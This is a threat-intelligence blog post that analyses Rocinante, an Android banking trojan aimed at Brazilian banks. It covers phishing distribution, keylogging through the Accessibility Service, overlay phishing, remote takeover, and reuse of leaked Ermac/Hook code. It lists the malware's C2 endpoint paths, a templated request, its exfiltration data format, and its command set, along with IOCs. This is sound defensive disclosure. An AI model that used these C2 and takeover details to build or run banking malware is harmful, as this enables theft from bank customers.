Skip to content
Research

Rocinante: The trojan horse that wanted to fly

28 August 2024

Introduction

The Mobile malware landscape has continuously evolving over the last few years, with many new actors joining a field that has been growing for almost a decade now. The introduction of simple and instant transactions via mobile attracted a myriad of new actors to this landscape.

Recently, we were able to identify a new strain of malware, originating from Brazil, which embodies this new wave of bankers, which we called Rocinante.

This malware family is capable of performing keylogging using the Accessibility Service, and is also able to steal PII from its victims using phishing screens posing as different banks. Finally, it can use all this exfiltrated information to perform Device takeover (DTO) of the device, by leveraging the Accessibility Service privileges to achieve full Remote Access on the infected device.

Key Takeaways

  • Rocinante is active in Brazil and targets the majority of banking institutions from this region
  • Rocinante is able to perform Keylogging, phishing attacks, and Remote Access Sessions on an infected device
  • Rocinante uses a combination of Firebase messaging, HTTP traffic, Websocket traffic, and the Telegram API to register the infected device, exfiltrate the information, and perform Device Takeover
  • The authors of Rocinante are influenced by developments in the threat landscape in other regions, adding parts of the source code of Ermac / Hook to their implementation

Rocinante or Pegasus?

it is clear from the the names of the Telegram bots that are used to collect the PII stolen by the malware or from the C2 endpoints paths used by the samples, that the actors behind this malware family refer to the bot as "Pegasus" or "PegasusSpy" internally. 

aaaaaaa

Adopting this name for the malware would be very confusing however. There is a very infamous Spyware family already called "Pegasus", developed by the NSO Group, which has been used to track and spy on journalists, lawyers, political dissidents, and human rights activists.

We want to clarify that the malware family that we are about to discuss has no ties with this existing malware family, and despite providing clear information on the victim, its capabilities as spyware are far inferior to the ones of NSO Group's Pegasus. Its targeting of Brazilian Banking institutions for financial gain also clearly differs from the existing Pegasus.

Considering the misunderstanding and confusion that would arise from adopting the name used by the actors behind this malware family, ThreatFabric analysts decided to assign another name to this malware family.

We will refer to this malware family in this article as "Rocinante", from the name of Don Quixote's horse. Just like its literary owner, Rocinante is aspiring to be something it is not, in this case a mythological winged horse.


DTO malware targeting Brazil

Rocinante falls in line with most malware families targeting Brazil that we have analysed over the course of the past few years. In most cases, banking malware retrieves its target list dynamically from a C2 server. This allows for more flexibility on the criminals' side: it enables using the same malware with different targets for different geographical reasons, and allows for temporarily "shutting off" the campaign by simply taking the C2 server offline.

This is not usually the case with malware distributed in Brazil. There are possible many reasons for this difference in behaviour. The most likely is that criminals design malware for the local market and are not interested in expanding their reach outside of the region. With this in mind, there is no need to introduce dynamic targets.

ThreatFabric identified a handful of different campaigns, posing as Security Updates, Courier applications, Rewards applications, and even Banking applications:

1

The main distribution mechanism is via Phishing websites, which trick the user into installing the malicious APK which is posing as a security solution or banking institution apps.

 

Targets

The latest list of targets that we were able to obtain from these samples includes institutions that make up the majority of the market share of Brazil, and offer a very large potential target base to criminals.

Once the victim opens the application and grants the Accessibility Services, he / she is welcomed with a choice screen. Each choice will trigger a different phishing page, asking the victim for their PII (each login page differs slightly based on the bank the malware is posing as).

Here as some of the phishing screens shown to the victim:

targets-1

The full list of targets from all the samples tracked is reported in the IOC section, at the end of this article.

 

Features and Capabilities

capabilities

C2 communication

Rocinante utilizes a combination of multiple different protocols and services to communicate information from the infected device.

Below are the protocols used:

Protocol Usage
HTTP Used to obtain initial token with Firebase, set-up WebSocket communication, and correlate with secondary C2
Web Socket Used to communicate keylogging results and receive commands from C2

 

The very first communication is initiated towards the Firebase messaging server, which registers the installations of the bot on the infected device and communicates a token that will be then be used in communication with one of the C2 servers later.

This token is used to correlate the unique ID used in the WebSocket communication with a specific installation of the malware.

The malware then contacts its first stage C2 server. This is done via a simple HTTP GET request, asking to upgrade the communication to use the WebSocket protocol. When this is successfully set up, the bot starts to communicate the keylogging data to its WebSocket server, and at the same time waits for commands to be executed.

The malware also utilises a third C2 server, which is used to communicate the installation token received from Firebase and correlate it with the ID used in the WebSocket communication:

GET /api/v1/Pegasus/InserirAtualizarToken?idUser=<WebSocketID>&Token=<FirebaseInstallationToken> HTTP/1.1
Host: <C2_Address>
Accept-Encoding: gzip, deflate, br
User-Agent: okhttp/4.9.2
Connection: keep-alive

From this URL we can also confirm that the naming used by criminals for this malware is indeed Pegasus.

The code base also contains other reachable paths, but they do not seem to be used currently. Based on the code and the path, we can infer the usage of these paths for future reference.

Path

Usage

Endpoints

Endpoint description
/api/v1/Pegasus/InserirBase64 Send JSON in Base64 Encoding

/api/v1/Pegasus/InserirObjeto

Send JSON

/api/v1/Pegasus/RecuperarComando

Receive a command

/api/v1/Pegasus/DeletarComando

Delete a specific command for an ID

/api/v1/Pegasus/DeletarComandoTodos

Delete all commands for an ID

/api/v1/Pegasus/InserirAtualizarToken

Pair a client ID with an Installation token

 

Keylogging, Phishing screens, and Exfiltration

Once the Accessibility Service privileges are granted, the malware starts actively logging everything that happens on the device.

Every time an event is fired, which means anytime anything happens on the UI, Rocinante logs in detail everything that is shown to the user on the UI.

Each event that is logged is then sent in the following format via the websocket channel:

{
   "top": <Coordinates from the top>,
   "bottom": <Coordinates from the bottom>,
   "left": <Coordinates from the left>,
   "right": <Coordinates from the right>,
   "centerX": <X Coordinates of the center of the element>,
   "centerY": <Y Coordinates of the center of the element>,
   "width": <Width>,
   "height": <Height>,
   "exactCenterX": <Exact X Coordinates of the center of the element>,
   "exactCenterY": <Exact Y Coordinates of the center of the element>,
   "text": <Text contained in the element>,
   "packageName": <Package name>,
   "className": <Class name>,
   "Visible": <Is the element visible>,
   "Focus": <Is the focus of the OS on this element>,
   "Password": <Is it a password Field>,
   "des": <Description of the text>,
   "clickable": <Is the element clickable>,
   "Enabled": <Is the element enabled>,
   "Checked": <Is the element checked>
}

In this way, the actors can effectively log any action or information that is shown to the victim on the screen of the infected device.

The most important information obtained by Rocinante, information obtained by the phishing pages, is processed directly on the client side, and sent using a different methodology. Each Rocinante sample is connected to a Telegram Bot whose job it is to receive the information about PII extracted from the bot.

The bot extracts the useful PII obtained using the bogus login pages posing as the target banks. It then publishes this information, formatted, into a chat that criminals have access to. The information slightly changes based on which fake login page was used to obtain it, and includes device information such as model and telephone number, CPF number, password, or account number:

TF_2024_Q2_Threat_Briefing_Akbank

Remote Actions

Another very important functionality of Rocinante, and something that is being actively developed by criminals, is the ability to perform remote actions on the infected device.

By leveraging the Accessibility Service privileges, this banker malware can simulate touches, gestures, and modify the text contained in EditText and MultiAutoCompleteTextView, which can be used to navigate the different UI screens on the infected device in order to initiate and then authorise fraudulent transactions.

The instructions on what to do are received from the C2 server via the WebSocket channel, and are listed  in the following section:

Commands

Command Description

touch

Simulates a touch event at specified coordinates 

livemode

Simulates a touch event at specified coordinates

left

Swipe left                                                

right

Swipe right                                                

up

Swipe up                                                  

down

Swipe down                                                

Ermac / Hook influence

Some of the older samples belonging to Rocinante date all the way back to December 2023. In the span of the last 6 months, Rocinante changed a large part of its code base: specifically, the section responsible for taking screenshots of the device's UI and part of the remote actions.

What is interesting is the fact that the previous implementation, present in the early versions of Rocinante, was actually taken from the Ermac family.

This is interesting because it is the first case in which we see a malware family taking advantage of the source code leak of Ermac / Hook that happened in 2023. In the past months we have seen a multitude of re-brandings of these families, managed by external actors and sold in hacking forums under different names. However, this is the first case in which an original malware family took the code from the leak and implemented just some part of it in their code.

ermac

Newer versions of Rocinante seem to have lost this part of the code. In some parts, the logic has been substituted with an alternative, like in the case of Screenshots, which are achieved in both versions, but with different techniques.

Some parts have been completely removed: this older code also contains the logic responsible for attacks towards cryptocurrency wallets, which is one of the main target groups of Ermac. This part is not present anymore in the more recent versions, while the usage of Telegram as a way to communicate the exfiltrated PII is only present in the latest versions.

It is also possible that these two versions are separate forks of the same initial project. However, we have not seen them being distributed at the same time, so at this time we are unable to prove or disprove either possibility. 

Conclusion

Despite featuring a relatively short list of samples, it is clear that Rocinante is currently under active development and has been already observed in the wild, targeting customers of Brazilian institutions.

With its keylogging, phishing, and remote access capabilities, it poses a significant risk to banking customers as their sensitive financial data, including account numbers, passwords, and transaction details, can be compromised. Once in possession of this information, malicious actors can initiate unauthorised transfers, and drain bank accounts. Additionally, the remote access capability allows attackers to maintain persistent control over the device, monitoring activities and potentially manipulating transactions in real time, further exacerbating the financial risk for unsuspecting customers.

The effort to hybridise this malware strain with code derived from leaked Ermac / Hook sources reveals a newfound curiosity among LATAM cybercriminals towards malicious activity originating outside their geographical area of interest. Historically, threat actors in LATAM primarily focused on the regional threat landscape, exhibiting little interest in external developments. This is also potentially a beginning of our predictions coming true: Ermac / Hook becoming the new “Cerberus” and the basis or source of inspiration for new threat actors and malware families.

Rocinante.A also serves an example of the vital set of capabilities for the modern banking malware that allows the criminals to perform their fraudulent operations even while the malware is in development stage, further enriching and driving development according to their interests.

IOCs

Samples

With Ermac / Hook Code

app name package name sha256

Security Protector

com.example.securityprotector

23c51ed174a6014b3207b41a82c2aee0eea16df8fa1cd14c2864fb3307215070

Without Ermac / Hook Code

app name package name sha256

Livelo Pontos

com.resgatelivelo.cash

64ec090ea5e22648e46651b12569107f94b10c1e8e4635ef42716aaec28fd6bd

Módulo de Segurança

com.viberotion1414.app

a4886346e8bcfd20f6b5131f2440004675cf851fa86fef7594f8096f63eb6a38

Módulo de Segurança

com.viberotion1414.app

a39a3acc18c84624489d91d25c4517097f18bf4cc3bb8282aa2689bcfd860b0f

 

Full list of targets

Institution

Bradesco

Itau

Banco do Brasil

Caixa Economica Federal

Santander

PicPay

Mercado Pago

Sicoob

PagSeguro

XP Investimentos

 

Supported Commands

Command Description

touch

Simulates a touch event at specified coordinates 

livemode

Simulates a touch event at specified coordinates

left

Swipe left                                                

right

Swipe right                                                

up

Swipe up                                                  

down

Swipe down                                                

aov

Set Screen to phishing screen                              

aov2

Set Screen to phishing screen                              

aov3

Set Screen to phishing screen                              

overpic

Set Screen to phishing screen for PicPay                  

overbra

Set Screen to phishing screen for Bradesco                

overmp

Set Screen to phishing screen for Mercado Pago            

overps

Set Screen to phishing screen for PagSeguro

oversic

Set Screen to phishing screen for Sicoob                  

overcai

Set Screen to phishing screen for Caixa Econômica Federal

oversant

Set Screen to phishing screen for Santander BR

overxp

Set Screen to phishing screen for XP Investimentos        

overlay

Set Screen to phishing screen for generic overlay          

 

Questions or demo?

CONTACT US